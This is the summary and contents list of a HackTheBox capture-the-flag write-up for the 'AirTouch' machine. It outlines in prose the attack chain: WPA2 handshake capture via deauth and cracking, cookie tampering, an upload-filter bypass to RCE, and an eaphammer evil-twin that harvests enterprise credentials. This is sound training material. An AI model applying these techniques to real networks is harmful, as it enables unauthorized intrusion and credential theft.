A detailed walkthrough of the HackTheBox machine 'AirTouch', which simulates a wireless network environment. The attack chain starts with extracting a default password from SNMP to SSH into a container with virtual wireless interfaces. From there, a WPA2-PSK handshake for the 'AirTouch-Internet' network is captured via deauth attack and cracked using aircrack-ng with rockyou.txt. Decrypting captured traffic in Wireshark reveals session cookies for a router management site. A client-side UserRole cookie is manipulated to gain admin access, and a PHP extension filter is bypassed using .phtml to achieve RCE. Hardcoded credentials in PHP source code provide the next user, and unrestricted sudo grants root. The root home directory contains CA and server certificates for the corporate WPA2-Enterprise network, which are used with eaphammer to set up an evil twin of 'AirTouch-Office' to capture PEAP-MSCHAPv2 credentials.
Table of contents
Box InfoReconShell as root@AirTouch-ConsultantConnection to AirTouch-InternetShell as www-data@AirTouch-AP-PSKShell as root@AirTouch-AP-PSKShell as remote@AirTouch-AP-MGTShell as root@AirTouch-AP-MGTSort: